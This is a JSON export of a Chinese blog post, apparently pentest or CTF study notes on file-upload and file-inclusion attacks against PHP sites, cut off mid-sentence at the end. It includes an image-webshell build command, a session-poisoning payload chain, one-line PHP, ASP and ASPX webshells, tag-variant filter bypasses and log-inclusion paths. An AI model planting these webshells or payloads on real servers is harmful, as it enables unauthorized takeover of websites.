{"id":344,"date":"2025-12-11T15:53:25","date_gmt":"2025-12-11T07:53:25","guid":{"rendered":"https:\/\/index.cmiteam.cn\/?p=344"},"modified":"2025-12-11T15:53:36","modified_gmt":"2025-12-11T07:53:36","slug":"%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0","status":"publish","type":"post","link":"https:\/\/index.cmiteam.cn\/index.php\/2025\/12\/11\/%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0\/","title":{"rendered":"\u6587\u4ef6\u4e0a\u4f20"},"content":{"rendered":"\n<p><strong>getimagesize()\u7c7b\u578b\u9a8c\u8bc1<\/strong><\/p>\n\n\n\n<p>\u8fd9\u4e2a\u51fd\u6570\u529f\u80fd\u4f1a\u5bf9\u76ee\u6807\u6587\u4ef6\u768416\u8fdb\u5236\u53bb\u8fdb\u884c\u4e00\u4e2a\u8bfb\u53d6\uff0c\u53bb\u8bfb\u53d6\u5934\u51e0\u4e2a\u5b57\u7b26\u4e32\u662f\u4e0d\u662f\u7b26\u5408\u56fe\u7247\u7684\u8981\u6c42\u7684<\/p>\n\n\n\n<p>\u90a3\u6211\u4eec\u5c31\u9700\u8981\u5236\u4f5c\u4e00\u4e2a\u5408\u683c\u7684\u56fe\u7247\u9a6c<\/p>\n\n\n\n<p>\u6211\u4eec\u8fd9\u91cc\u4f7f\u7528cmd\u547d\u4ee4\u7684\u65b9\u6cd5<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">CMD\uff1acopy \/b test.png + muma.php ccc.png<\/pre>\n\n\n\n<p>\u6700\u540e\u4f1a\u751f\u6210\u4e00\u4e2a\u540d\u4e3accc.png\u7684\u56fe\u7247\u9a6c<\/p>\n\n\n\n<p>\u5982\u679c\u663e\u793a\u7cfb\u7edf\u627e\u4e0d\u5230\u6587\u4ef6\u5c31\u7528 \" \" \u5305\u88f9\u6587\u4ef6<\/p>\n\n\n\n<p>\u6216\u8005\u76f4\u63a5\u5728\u6587\u4ef6\u5f00\u5934\uff0c\u5199\u5165<\/p>\n\n\n\n<pre 
class=\"wp-block-preformatted\">GIF89a<\/pre>\n\n\n\n<p>\u4f2a\u88c5\u6210\u4e00\u4e2a\u6587\u4ef6<\/p>\n\n\n\n<p><strong>session\u6587\u4ef6\u5305\u542b<\/strong><\/p>\n\n\n\n<p>\u7b80\u4ecb<\/p>\n\n\n\n<p>\u603b\u7ed3\uff1a\u5728\u5ba2\u6237\u7aef\u5c1d\u8bd5\u6784\u9020\u4e00\u4e2aPOST\u8bf7\u6c42\uff08\u7528\u4e8e\u8be2\u95ee\u6587\u4ef6\u4e0a\u4f20\u8fdb\u5ea6\uff0c\u4e0d\u8bba\u662f\u5426\u9700\u8981\u4e0a\u4f20\u6587\u4ef6\uff0c\u90fd\u53ef\u4ee5\u6784\u9020\uff09\uff0c\u8be5\u6570\u636e\u5305\u5305\u542b\u4e00\u4e2a\u53c2\u6570\"PHP_SESSION_UPLOAD_PROGRESS\",\u8be5\u53c2\u6570\u662f\u4e00\u4e2a\u4e34\u65f6\u53c2\u6570\u4f1a\u88ab\u77ed\u6682\u7684\u5305\u542b\u8fdb\u4e00\u4e2a\u4e34\u65f6\u6587\u4ef6\u4e0bsession\u4e0b\u3010\u8be5\u53c2\u6570\u7684\u503c\u53ef\u4ee5\u8bbe\u7f6e\u4e3a\u201d\u201c\u7b49\u5185\u5bb9\u3011\uff0c\u901a\u8fc7\u67e5\u770b\u8be5\u6587\u4ef6\u6240\u5728\u4f4d\u7f6e\u4ee5\u53ca\u6587\u4ef6\u540d\uff0c\u5c06\u4e34\u65f6\u5b58\u5728\u7684\u6587\u4ef6\u5305\u542b\uff0c\u9700\u8981\u627e\u5230\u6587\u4ef6\u5305\u542b\u7684\u6ce8\u5165\u70b9\uff08\u6587\u4ef6\u5305\u542b\u7684\u53c2\u6570\uff09\u5c06session\u6587\u4ef6\u5305\u542b\u3002 \uff081\uff09 \u56e0\u4e3aPHP_SESSION_UPLOAD_PROGRESS\u7684\u503c\u662f\u88ab\u77ed\u6682\u5305\u542b\u4e8esess_XXXX\u6587\u4ef6\u4e2d\uff08\u67e5\u8be2\u5b8c\u6bd5\u8be5\u53c2\u6570\u503c\u4f1a\u88ab\u5220\u9664\uff09\uff0c\u9700\u8981\u501f\u52a9bp\u7206\u7834\uff0c\u4e00\u76f4\u4e0d\u505c\u7684\u53d1\u9001POST\u8bf7\u6c42\u5305\uff082\uff09 \u540c\u65f6\uff0c\u5229\u7528\u6587\u4ef6\u5305\u542b\uff0c\u501f\u52a9bp\u7206\u7834\u5c06sess_XXXX\u6587\u4ef6\u5305\u542b 
<strong>Session\u6587\u4ef6\u5305\u542b\u5b9e\u73b0\u7684\u539f\u7406<\/strong><\/p>\n\n\n\n<p>\u5f53\u53ef\u4ee5\u83b7\u53d6Session\u6587\u4ef6\u8def\u5f84\u5e76\u4e14Session\u6587\u4ef6\u5185\u5bb9\u53ef\u63a7\u65f6\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7\u5305\u542bsession\u6587\u4ef6\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n\n\n\n<p>\u5b9e\u73b0\u539f\u7406<\/p>\n\n\n\n<p>PHP5.4.0\u4e4b\u540e\u4e3a\u65b9\u4fbf\u7528\u6237\u67e5\u770b\u6587\u4ef6\u4e0a\u4f20\u7684\u8fdb\u5ea6\uff08\u5728\u6d4f\u89c8\u5668\u4e2d\uff09\uff0c\u5728\u6587\u4ef6\u4e0a\u4f20\u65f6\u7528\u53ef\u4ee5\u53d1\u9001\u4e00\u4e2aPOST\u8bf7\u6c42\u5230\u7ec8\u7aef\uff08\u5982XHR\uff09\u6765\u68c0\u67e5\u8fd9\u4e2a\u72b6\u6001\u3002 POST\u8bf7\u6c42\u5185\u5bb9\uff1a\u4e0a\u4f20\u6587\u4ef6\u8fdb\u5ea6\u540d\u524d\u7f00+\u4e0a\u4f20\u6587\u4ef6\u540d\uff08\u5939\u5e26\u79c1\u8d27\uff0c\u6bd4\u5982\u4e00\u53e5\u8bdd\u6728\u9a6c\uff09 \u5c06POST\u8bf7\u6c42\u5185\u5bb9\u4fdd\u5b58\uff08\u6587\u4ef6\u4e0a\u4f20\u8fdb\u5ea6\u7684\u4fe1\u606f\uff09\u5728\u751f\u6210\u7684\u4e34\u65f6\u6587\u4ef6session\u4e0b 
\u5728\u8bfb\u53d6\u5b8cPOST\u7684\u6570\u636e\u540e\uff0cphp\u5c31\u4f1a\u5220\u9664session\u6587\u4ef6\u4e2d\u5173\u4e8e\u4e0a\u4f20\u8fdb\u5ea6\u7684\u4fe1\u606f\u3002<\/p>\n\n\n\n<p>\u5b9e\u73b0\uff1a\u5f53\u4e00\u4e2a\u4e0a\u4f20\u5728\u5904\u7406\u4e2d\uff0c\u540c\u65f6POST\u4e00\u4e2a\u4e0eini\u4e2d\u8bbe\u7f6e\u7684session.upload_progress.name\u540c\u540d\u53d8\u91cf\u65f6\uff0c\u4e0a\u4f20\u8fdb\u5ea6\u53ef\u4ee5\u5728$<em>session\u4e2d\u83b7\u5f97\u3002\u5f53PHP\u68c0\u6d4b\u5230\u8fd9\u79cdPOST\u8bf7\u6c42\u65f6\uff0c\u4f1a\u5728$<\/em>session\u4e2d\u6dfb\u52a0\u4e00\u7ec4\u6570\u636e\uff0c\u7d22\u5f15\u503c\u662f\uff1asession.upload_progress.prefix\u4e0esession.upload_progress.name\u8fde\u63a5\u5230\u4e00\u8d77\u7684\u503c\u3002\u8fd9\u4e9b\u952e\u503c\u53ef\u4ee5\u901a\u8fc7\u8bfb\u53d6ini\u8bbe\u7f6e\u6765\u83b7\u5f97<\/p>\n\n\n\n<p>\u76f8\u5173\u914d\u7f6e\uff1asession.upload_progress.enabled = On \uff08\u5141\u8bb8\u68c0\u6d4b\u6587\u4ef6\u4e0a\u4f20\u8fdb\u5ea6\uff09session.upload_progress.prefix = \u201cupload_progress_\u201d \uff08\u4e0a\u4f20\u6587\u4ef6\u8fdb\u5ea6\u540d\u524d\u7f00\uff09session.upload_progress.name = \u201cPHP_SESSION_UPLOAD_PROGRESS\u201d \uff08\u4e0a\u4f20\u6587\u4ef6\u540d\uff09 
\u5b58\u50a8\u673a\u5236<\/p>\n\n\n\n<p>\u672c\u8d28\uff1a\u5f53\u5f00\u542fsession\u65f6\uff0c\u670d\u52a1\u5668\u4f1a\u5728\u4e34\u65f6\u76ee\u5f55\u4e0b\u521b\u5efa\u4e00\u4e2asession\u6587\u4ef6\u4fdd\u5b58\u4f1a\u8bdd\u4fe1\u606f\uff0c\u6587\u4ef6\u683c\u5f0f\u4e3asess_PHPSESSID<\/p>\n\n\n\n<p><strong>Session\u6587\u4ef6\u5305\u542b\u524d\u63d0<\/strong><\/p>\n\n\n\n<p>1\uff09\u901a\u8fc7session_start()\u624d\u80fd\u5f00\u542fsession\uff0c\u5982\u679c\u6ca1\u6709session_start()\u8fd9\u4e2a\u6761\u4ef6\u662f\u5426\u5c31\u6ca1\u6cd5\u5229\u7528\u4e86\uff0c\u8fd9\u65f6\u9700\u8981\u4e86\u89e3\u5230\u53e6\u4e00\u4e2a\u76f8\u5173\u914d\u7f6e\uff1asession.use_strict_mode<\/p>\n\n\n\n<p>session.use_strict_mode=on<\/p>\n\n\n\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u6b64\u6a21\u5757\u662f\u5173\u95ed\u7684\u3002<\/p>\n\n\n\n<p>\u4f1a\u9632\u6b62\u4f1a\u8bdd\u6a21\u5757\u672a\u521d\u59cb\u4f1a\u8bdd\u7684ID\u3002\u4ec5\u63a5\u53d7\u5b83\u81ea\u5df1\u521b\u5efa\u6709\u6548\u4f1a\u8bddID\uff0c\u800c\u62d2\u7edd\u7528\u6237\u81ea\u5df1\u521b\u5efa\u7684\u4f1a\u8bddID\u3002<\/p>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u81ea\u884c\u8bbe\u7f6ecookie\u6216\u8005\u4f7f\u7528JavaScript\u6ce8\u5165\u7684\u65b9\u5f0f\u6765\u8bbe\u7f6e\u4f1a\u8bddID\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n\n\n\n<p>\u8be5\u9009\u9879\u4e0d\u5f00\u542f\uff0c\u6211\u4eec\u53ef\u4ee5\u81ea\u5b9a\u4e49session_id\uff0c\u5982\uff0c\u6211\u4eec\u5728\u8bf7\u6c42\u6570\u636e\u5305\u8bbe\u7f6ecookie\u4e3aPHPSESSID=123,\u90a3\u4e48\u5c31\u4f1a\u751f\u6210\u4e00\u4e2asess_123\u7684session\u6587\u4ef6\uff0c\u6b64\u65f6php\u4f1a\u81ea\u52a8\u521d\u59cb\u5316session\uff0c\u5e76\u4ea7\u751f\u4e00\u4e2a\u952e\u503c\uff0c\u683c\u5f0f\u4e3a\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684session.upload_progress.prefix\u7684\u503c+\u6211\u4eec\u4e0a\u4f20\u7684session.upload_progress.name\u7684\u503c\u6b64\u952e\u503c\u4f1a\u5199\u5165session\u6587\u4ef6\u3002\u8be5\u952e\u503c\u7684\u683c\u5f0f\u5e94\u8be5\u4e3a\uff1aupload_progress_+PHP_SESSIO
N_UPLOAD_PROGRESS\u7684\u503c\u3002<\/p>\n\n\n\n<p>2\uff09 \u56e0\u4e3a session.upload_progress.cleanup\u9ed8\u8ba4\u662f\u5f00\u542f\u7684\uff0c\u5bfc\u81f4\u5728\u4e0a\u4f20\u7ed3\u675f\u540e\uff0csession\u6587\u4ef6\u4e2d\u6709\u5173\u7684\u4e0a\u4f20\u8fdb\u5ea6\u4fe1\u606f\uff08\u7ec8\u70b9\u5728\u4e8e\u201c\u5939\u5e26\u7684\u79c1\u8d27\u201d\u4e5f\u4f1a\u88ab\u6e05\u9664\uff09\u4f1a\u9a6c\u4e0a\u88ab\u5220\u9664\uff0c\u6b64\u65f6\u9700\u8981\u4f7f\u7528\u6761\u4ef6\u7ade\u4e89\u89e3\u51b3\u3002\u4f7f\u7528python\u811a\u672c\u6216burp\u4e0d\u65ad\u4e0a\u4f20\u6570\u636e\u5305\uff0c\u7136\u540e\u5728\u7528\u76f8\u540c\u7684\u65b9\u5f0f\u53d1\u9001\u6587\u4ef6\u6309\u5305\u542b\u6570\u636e\u5305\uff0c\u5373\u53ef\u5305\u542b<\/p>\n\n\n\n<p><strong>Session\u6587\u4ef6\u5305\u542b\u5229\u7528\u6280\u5de7<\/strong><\/p>\n\n\n\n<p>\u83b7\u53d6Session\u6587\u4ef6\u6240\u5728\u4f4d\u7f6e session\u7684\u6587\u4ef6\u540d\u4ee5sess_\u5f00\u5934\uff0c\u540e\u8ddfsessionid\u3002sessionid\u53ef\u4ee5\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u83b7\u53d6\u3002 \u901a\u8fc7phpinfo\u7684\u4fe1\u606f\u83b7\u53d6session\u7684\u5b58\u50a8\u4f4d\u7f6e\uff0cphpinfo\u4e2d\u7684session.save_path\u4fdd\u5b58\u7684\u662fsession\u7684\u5b58\u50a8\u4f4d\u7f6e\u3002 \u901a\u8fc7\u731c\u6d4b\u9ed8\u8ba4\u7684session\u5b58\u50a8\u4f4d\u7f6e\u8fdb\u884c\u5c1d\u8bd5\uff0c\u901a\u5e38\u5728Linux\u4e2dSession\u9ed8\u8ba4\u5b58\u50a8\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6587\u4ef6\u8def\u5f84\u4f8b\u5982\uff1a\/var\/lib\/php\/sess_PHPSESSID<br>\/var\/lib\/php\/sessions\/sess_PHPSESSID<br>\/tmp\/sess_PHPSESSID<br>\/tmp\/sessions\/sess_PHPSESSID<\/li>\n<\/ul>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<ol 
class=\"wp-block-list\">\n<li>\/var\/lib\/php\/<\/li>\n\n\n\n<li>\/var\/lib\/php\/sessions\/<\/li>\n\n\n\n<li>\/tmp\/<\/li>\n\n\n\n<li>\/tmp\/sessions\/<\/li>\n<\/ol>\n<\/blockquote>\n\n\n\n<p><strong>\u63a7\u5236Session\u5185\u5bb9<\/strong><\/p>\n\n\n\n<p>\u4f8b\u5982\uff1a\u4e0b\u8ff0\u4ee3\u7801\u4f1a\u5c06\u83b7\u53d6\u7684GET\u578bctfs\u53d8\u91cf\u7684\u503c\u5b58\u5165session\u4e2d\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528GET\u578bctfs\u53c2\u6570\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165session\u6587\u4ef6\u4e2d\uff0c\u7136\u540e\u518d\u5229\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5305\u542b\u6b64session\u6587\u4ef6\uff0c\u5411\u7cfb\u7edf\u4e2d\u4f20\u5165\u6076\u610f\u4ee3\u7801\u3002<\/p>\n\n\n\n<p>&lt;?php session_start(); $ctfs=$_GET['ctfs']; $_SESSION[\"username\"]=$ctfs; ?&gt; \u6b64php\u4f1a\u5c06\u83b7\u53d6\u5230\u7684GET\u578bctfs\u53d8\u91cf\u7684\u503c\u5b58\u5165\u5230session\u4e2d\u3002 \u5f53\u8bbf\u95ee<a href=\"http:\/\/www.ctfs-wiki\/session.php?ctfs=ctfs\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/www.ctfs-wiki\/session.php?ctfs=ctfs<\/a> \u540e\uff0c\u4f1a\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u5b58\u50a8session\u7684\u503c\u3002 session\u7684\u6587\u4ef6\u540d\u4e3asess_+sessionid\uff0csessionid\u53ef\u4ee5\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u83b7\u53d6\u3002 \u901a\u8fc7\u4e0a\u9762\u7684\u5206\u6790\uff0c\u53ef\u4ee5\u77e5\u9053ctfs\u4f20\u5165\u7684\u503c\u4f1a\u5b58\u50a8\u5230session\u6587\u4ef6\u4e2d\uff0c\u5982\u679c\u5b58\u5728\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7ctfs\u5199\u5165\u6076\u610f\u4ee3\u7801\u5230session\u6587\u4ef6\u4e2d\uff0c\u7136\u540e\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u6267\u884c\u6b64\u6076\u610f\u4ee3\u7801getshell\u3002 \u5f53\u8bbf\u95ee<a href=\"http:\/\/www.ctfs-wiki\/session.php?ctfs=\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/www.ctfs-wiki\/session.php?ctfs=<\/a>&lt;?php 
phpinfo();?&gt;\u540e\uff0c\u4f1a\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u5b58\u50a8session\u7684\u503c\u3002 \u653b\u51fb\u8005\u901a\u8fc7phpinfo()\u4fe1\u606f\u6cc4\u9732\u6216\u8005\u731c\u6d4b\u80fd\u83b7\u53d6\u5230session\u5b58\u653e\u7684\u4f4d\u7f6e\uff0c\u6587\u4ef6\u540d\u79f0\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u53ef\u83b7\u53d6\u5230\uff0c\u7136\u540e\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u7684\u6f0f\u6d1e\u89e3\u6790\u6076\u610f\u4ee3\u7801getshell\u3002<\/p>\n\n\n\n<p>payload:<\/p>\n\n\n\n<p>=&lt;?php phpinfo();?&gt; <a href=\"http:\/\/127.0.0.1\/session.php?ctfs=\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/127.0.0.1\/session.php?ctfs=<\/a>&lt;?php phpinfo; ?&gt; <a href=\"http:\/\/127.0.0.1\/FI.php?filename=\/var\/lib\/php\/session\/sess_812342oi455684090\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/127.0.0.1\/FI.php?filename=\/var\/lib\/php\/session\/sess_812342oi455684090<\/a><\/p>\n\n\n\n<p>\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n<p><strong>\u6700\u7b80\u5355\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &lt;?php @eval($_POST['attack']);?&gt;<\/pre>\n\n\n\n<p>\u5229\u7528\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u5f80\u76ee\u6807\u7f51\u7ad9\u4e2d\u4e0a\u4f20\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u7136\u540e\u4f60\u5c31\u53ef\u4ee5\u5728\u672c\u5730\u901a\u8fc7\u4e2d\u56fd\u83dc\u5200chopper.exe\u5373\u53ef\u83b7\u53d6\u548c\u63a7\u5236\u6574\u4e2a\u7f51\u7ad9\u76ee\u5f55\u3002@\u8868\u793a\u540e\u9762\u5373\u4f7f\u6267\u884c\u9519\u8bef\uff0c\u4e5f\u4e0d\u62a5\u9519\u3002eval\uff08\uff09\u51fd\u6570\u8868\u793a\u62ec\u53f7\u5185\u7684\u8bed\u53e5\u5b57\u7b26\u4e32\u4ec0\u4e48\u7684\u5168\u90fd\u5f53\u505a\u4ee3\u7801\u6267\u884c\u3002$_POST['attack']\u8868\u793a\u4ece\u9875\u9762\u4e2d\u83b7\u5f97attack\u8fd9\u4e2a\u53c2\u6570\u503c\u3002<\/p>\n\n\n\n<p>\u5e38\u89c1\u5f62\u5f0f<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">php\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\uff1a 
&lt;?php @eval($_POST['pass']);?&gt;<br>asp\u7684\u4e00\u53e5\u8bdd\u662f\uff1a &nbsp; &lt;%eval request (\"pass\")%&gt;<br>aspx\u7684\u4e00\u53e5\u8bdd\u662f\uff1a  &lt;%@ Page Language=\"Jscript\"%&gt; &lt;%eval(Request.Item[\"pass\"],\"unsafe\");%&gt;<\/pre>\n\n\n\n<p>\u57fa\u672c\u539f\u7406<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php @eval($_POST['cmd']); ?&gt;<\/pre>\n\n\n\n<p>\u4e3a\u4ec0\u4e48\u5bc6\u7801\u662fcmd<\/p>\n\n\n\n<p>\u90a3\u5c31\u8981\u6765\u7406\u89e3\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u4e86\u3002php\u91cc\u9762\u51e0\u4e2a\u8d85\u5168\u5c40\u53d8\u91cf\uff1a<code>$_GET<\/code>\u3001<code>$_POST<\/code>\u5c31\u662f\u5176\u4e2d\u4e4b\u4e00\u3002<code>$_POST['a']<\/code>; \u7684\u610f\u601d\u5c31\u662fa\u8fd9\u4e2a\u53d8\u91cf\uff0c\u7528post\u7684\u65b9\u6cd5\u63a5\u6536\u3002<\/p>\n\n\n\n<p>\u5982\u4f55\u7406\u89e3<code>eval()\u51fd\u6570<\/code>\uff1f<\/p>\n\n\n\n<p>eval()\u628a\u5b57\u7b26\u4e32\u4f5c\u4e3aPHP\u4ee3\u7801\u6267\u884c\u3002<\/p>\n\n\n\n<p>\u4f8b\u5982\uff1aeval(\"echo 'a'\");\u5176\u5b9e\u5c31\u7b49\u4e8e\u76f4\u63a5 echo 'a';\u518d\u6765\u770b\u770b&lt;?php eval($_POST['pw']); ?&gt;\u9996\u5148\uff0c\u7528post\u65b9\u5f0f\u63a5\u6536\u53d8\u91cfpw\uff0c\u6bd4\u5982\u63a5\u6536\u5230\u4e86\uff1apw=echo 'a';\u8fd9\u65f6\u4ee3\u7801\u5c31\u53d8\u6210&lt;?php eval(\"echo 'a';\"); ?&gt;\u3002<\/p>\n\n\n\n<p>\u8fde\u8d77\u6765\u610f\u601d\u5c31\u662f\uff1a\u7528post\u65b9\u6cd5\u63a5\u6536\u53d8\u91cfpw\uff0c\u628a\u53d8\u91cfpw\u91cc\u9762\u7684\u5b57\u7b26\u4e32\u5f53\u505aphp\u4ee3\u7801\u6765\u6267\u884c\u3002\u6240\u4ee5\u4e5f\u5c31\u80fd\u8fd9\u4e48\u73a9\uff1a\u4e5f\u5c31\u662f\u8bf4\uff0c\u4f60\u60f3\u6267\u884c\u4ec0\u4e48\u4ee3\u7801\uff0c\u5c31\u628a\u4ec0\u4e48\u4ee3\u7801\u653e\u8fdb\u53d8\u91cfpw\u91cc\uff0c\u7528post\u4f20\u8f93\u7ed9\u4e00\u53e5\u8bdd\u6728\u9a6c\u3002<\/p>\n\n\n\n<p>\u56db\u79cdPHP\u6807\u8bb0<\/p>\n\n\n\n<p>\u77ed\u6807\u7b7e\u7684\u7ed5\u8fc7<\/p>\n\n\n\n<pre 
class=\"wp-block-preformatted\">1:XML\u98ce\u683c\uff0c\u4e5f\u662f\u5b98\u65b9\u63a8\u8350\u7684\u5f62\u5f0f<br>&lt;?php @eval($_POST[1]);?><br>    <br>\u200b<br>2:\u77ed\u6807\u8bb0<br>&lt;? @eval($_POST[1]);?><br>\u9700\u8981\u5f00\u542f\u914d\u7f6e\u53c2\u6570short_open_tags=on<br>&lt;?= @eval($_POST[1]);<br>\u81ea PHP 5.4 \u8d77\uff0c\u77ed\u683c\u5f0f\u7684 echo \u6807\u8bb0 &lt;?= \u603b\u4f1a\u88ab\u8bc6\u522b\u5e76\u4e14\u5408\u6cd5\uff0c\u800c\u4e0d\u7ba1 short_open_tag \u7684\u8bbe\u7f6e\u662f\u4ec0\u4e48\u3002<br>    <br>\u200b<br>3:ASP\u98ce\u683c<br>&lt;% @eval($_POST[1]); %><br>    ASP\u98ce\u683c\u6807\u8bb0\u4ec5\u5728\u901a\u8fc7php.ini\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u6307\u4ee4asp_tags\u6253\u5f00\u540e\u624d\u53ef\u7528\u3002<br>\u200b<br>\u200b<br>4:\u811a\u672c\u98ce\u683c<br>&lt;script language=\"php\"><br> \u00a0  echo \"666\";<br>&lt;\/script><br>    PHP 7.0.0\u4ee5\u540e\u5931\u6548<\/pre>\n\n\n\n<p>\u65e5\u5fd7\u5305\u542b<\/p>\n\n\n\n<p>\u5f53\u8fc7\u6ee4\u4e86\u5f88\u591a\u7b26\u53f7\u65f6\u6211\u4eec\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\u65e0\u6cd5\u4e0a\u4f20\uff0c\u5e76\u4e14\u6ca1\u6709url_allow_include \u529f\u80fd\u65f6\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u8003\u8651\u5305\u542b\u670d\u52a1\u5668\u7684\u65e5\u5fd7\u6587\u4ef6\uff0c\u5f53\u6211\u4eec\u8bbf\u95ee\u7f51\u7ad9\u65f6\uff0c\u670d\u52a1\u5668\u7684\u65e5\u5fd7\u4e2d\u4f1a\u8bb0\u5f55\u6211\u4eec\u7684\u884c\u4e3a\uff0c\u5f53\u6211\u4eec\u8bbf\u95ee\u94fe\u63a5\u4e2d\u5305\u542bPHP\u4e00\u53e5\u8bdd\u6728\u9a6c\u65f6\uff0c\u4e5f\u4f1a\u88ab\u8bb0\u5f55\u65e5\u5fd7\u4e2d<\/p>\n\n\n\n<p>\u5e38\u89c1\u76ee\u6807\u65e5\u5fd7\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table 
class=\"has-fixed-layout\"><thead><tr><th>\u65e5\u5fd7\u7c7b\u578b<\/th><th>\u9ed8\u8ba4\u8def\u5f84\uff08Linux\uff09<\/th><th>\u8bf4\u660e<\/th><\/tr><\/thead><tbody><tr><td>Nginx\u8bbf\u95ee\u65e5\u5fd7<\/td><td><code>\/var\/log\/nginx\/access.log<\/code><\/td><td>\u8bb0\u5f55HTTP\u8bf7\u6c42<\/td><\/tr><tr><td>Apache\u8bbf\u95ee\u65e5\u5fd7<\/td><td><code>\/var\/log\/apache2\/access.log<\/code><\/td><td>\u8bb0\u5f55HTTP\u8bf7\u6c42<\/td><\/tr><tr><td>PHP\u9519\u8bef\u65e5\u5fd7<\/td><td><code>\/var\/log\/php_errors.log<\/code><\/td><td>\u8bb0\u5f55PHP\u8fd0\u884c\u9519\u8bef<\/td><\/tr><tr><td>SSH\u65e5\u5fd7<\/td><td><code>\/var\/log\/auth.log<\/code><\/td><td>\u8bb0\u5f55SSH\u767b\u5f55\u5c1d\u8bd5<\/td><\/tr><tr><td>\u90ae\u4ef6\u65e5\u5fd7<\/td><td><code>\/var\/log\/mail.log<\/code><\/td><td>\u8bb0\u5f55\u90ae\u4ef6\u53d1\u9001\u8bb0\u5f55<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>user.ini<\/strong><\/h3>\n\n\n\n<p>\u8fd9\u5f97\u4ecephp.ini\u8bf4\u8d77\u4e86\u3002php.ini\u662fphp\u9ed8\u8ba4\u7684\u914d\u7f6e\u6587\u4ef6\uff0c\u5176\u4e2d\u5305\u62ec\u4e86\u5f88\u591aphp\u7684\u914d\u7f6e\uff0c\u8fd9\u4e9b\u914d\u7f6e\u4e2d\uff0c\u53c8\u5206\u4e3a\u51e0\u79cd\uff1a<code>PHP_INI_SYSTEM<\/code>\u3001<code>PHP_INI_PERDIR<\/code>\u3001<code>PHP_INI_ALL<\/code>\u3001<code>PHP_INI_USER<\/code>\u3002<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u6a21\u5f0f<\/th><th>\u542b\u4e49<\/th><\/tr><\/thead><tbody><tr><td>PHP_INI_USER<\/td><td>\u53ef\u5728\u7528\u6237\u811a\u672c\uff08\u6bd4\u5982ini_set\uff09\u6216Windows\u6ce8\u518c\u8868\u4ee5\u53ca.user.ini\u4e2d\u8bbe\u5b9a<\/td><\/tr><tr><td>PHP_INI_PERDIR<\/td><td>\u53ef\u5728php.ini, 
.htaccess\u6216httpd.conf\u4e2d\u8bbe\u5b9a<\/td><\/tr><tr><td>PHP_INI_SYSTEM<\/td><td>\u53ef\u5728php.ini\u6216httpd.conf\u4e2d\u8bbe\u5b9a<\/td><\/tr><tr><td>PHP_INI_ALL<\/td><td>\u53ef\u4ee5\u5728\u4efb\u4f55\u5730\u65b9\u8bbe\u5b9a<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u5176\u4e2d\u5c31\u63d0\u5230\u4e86\uff0c\u6a21\u5f0f\u4e3aPHP_INI_USER\u7684\u914d\u7f6e\u9879\uff0c\u53ef\u4ee5\u5728ini_set()\u51fd\u6570\u4e2d\u8bbe\u7f6e\u3001\u6ce8\u518c\u8868\u4e2d\u8bbe\u7f6e\uff0c\u518d\u5c31\u662f.user.ini\u4e2d\u8bbe\u7f6e\u3002 \u8fd9\u91cc\u5c31\u63d0\u5230\u4e86.user.ini\uff0c\u90a3\u4e48\u8fd9\u662f\u4e2a\u4ec0\u4e48\u914d\u7f6e\u6587\u4ef6\uff1f<\/p>\n\n\n\n<p>\u9664\u4e86\u4e3b php.ini \u4e4b\u5916\uff0cPHP \u8fd8\u4f1a\u5728\u6bcf\u4e2a\u76ee\u5f55\u4e0b\u626b\u63cf INI \u6587\u4ef6\uff0c\u4ece\u88ab\u6267\u884c\u7684 PHP \u6587\u4ef6\u6240\u5728\u76ee\u5f55\u5f00\u59cb\u4e00\u76f4\u4e0a\u5347\u5230 web \u6839\u76ee\u5f55\uff08<code>$_SERVER['DOCUMENT_ROOT']<\/code> \u6240\u6307\u5b9a\u7684\uff09\u3002\u5982\u679c\u88ab\u6267\u884c\u7684 PHP \u6587\u4ef6\u5728 web \u6839\u76ee\u5f55\u4e4b\u5916\uff0c\u5219\u53ea\u626b\u63cf\u8be5\u76ee\u5f55\u3002<\/p>\n\n\n\n<p>\u5728 